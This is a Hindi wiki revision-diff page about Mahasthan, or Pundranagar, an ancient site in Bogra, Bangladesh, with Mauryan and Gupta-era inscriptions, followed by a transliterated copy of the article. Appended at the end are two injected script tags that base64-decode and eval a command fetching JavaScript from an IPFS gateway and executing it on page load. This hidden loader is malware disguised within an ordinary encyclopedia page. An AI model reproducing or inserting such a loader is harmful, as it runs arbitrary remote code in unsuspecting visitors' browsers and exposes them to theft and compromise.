Difference between revisions of "महास्थान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:विदेशी स्थान; Adding category Category:ऐतिहासिक स्थल (को हटा दिया गया हैं।))
 
(2 intermediate revisions by 2 users not shown)
Line 2: Line 2:
 
'''महास्थान अथवा पुंड्रनगर'''
 
'''महास्थान अथवा पुंड्रनगर'''
  
*महास्थान एक सऐतिहासिक स्थान जो [[बांग्लादेश]] के बोगरा ज़िले में [[गंगा नदी]] की मुख्य धारा पद्मा के उत्तर में स्थित है।  
+
*महास्थान एक ऐतिहासिक स्थान जो [[बांग्लादेश]] के बोगरा ज़िले में [[गंगा नदी]] की मुख्य धारा पद्मा के उत्तर में स्थित है।  
 
*महास्थान में [[अशोक]] के पूर्व के [[मौर्य]] अभिलेख मिले हैं। अभिलेख में उल्लिखित है कि उस समय महास्थान का नाम पुंड्रनगर था।  
 
*महास्थान में [[अशोक]] के पूर्व के [[मौर्य]] अभिलेख मिले हैं। अभिलेख में उल्लिखित है कि उस समय महास्थान का नाम पुंड्रनगर था।  
 
*पुंड्रनगर के महामत्त का वर्णन अकाल सहायता की कार्यवाहियों के अध्यक्ष के रूप में किया गया है। अभी तक यहाँ पर की गई खुदाइयों से शुंगकाल की मृण्मूर्तियाँ मिली हैं।  
 
*पुंड्रनगर के महामत्त का वर्णन अकाल सहायता की कार्यवाहियों के अध्यक्ष के रूप में किया गया है। अभी तक यहाँ पर की गई खुदाइयों से शुंगकाल की मृण्मूर्तियाँ मिली हैं।  
*गुप्तकाल में पुंड्र, पुंड्रवर्धनभुक्ति नाम से दामोदरपुर घट्टलेखों में वर्णित है।  
+
*गुप्तकाल में पुंड्रनगर  पुंड्रवर्धनभुक्ति नाम से दामोदरपुर घट्टलेखों में वर्णित है।  
  
  
Line 15: Line 15:
  
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{विदेशी स्थान}}
 
{{मौर्य काल}}
 
{{मौर्य काल}}
 
[[Category:मौर्य काल]][[Category:इतिहास कोश]]
 
[[Category:मौर्य काल]][[Category:इतिहास कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
[[Category:नया पन्ना]]
+
[[Category:ऐतिहासिक स्थल]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:35, 1 August 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

mahasthan athava puandranagar

  • mahasthan ek aitihasik sthan jo baangladesh ke bogara zile mean ganga nadi ki mukhy dhara padma ke uttar mean sthit hai.
  • mahasthan mean ashok ke poorv ke maury abhilekh mile haian. abhilekh mean ullikhit hai ki us samay mahasthan ka nam puandranagar tha.
  • puandranagar ke mahamatt ka varnan akal sahayata ki karyavahiyoan ke adhyaksh ke roop mean kiya gaya hai. abhi tak yahaan par ki gee khudaiyoan se shuangakal ki mrinmoortiyaan mili haian.
  • guptakal mean puandranagar puandravardhanabhukti nam se damodarapur ghattalekhoan mean varnit hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>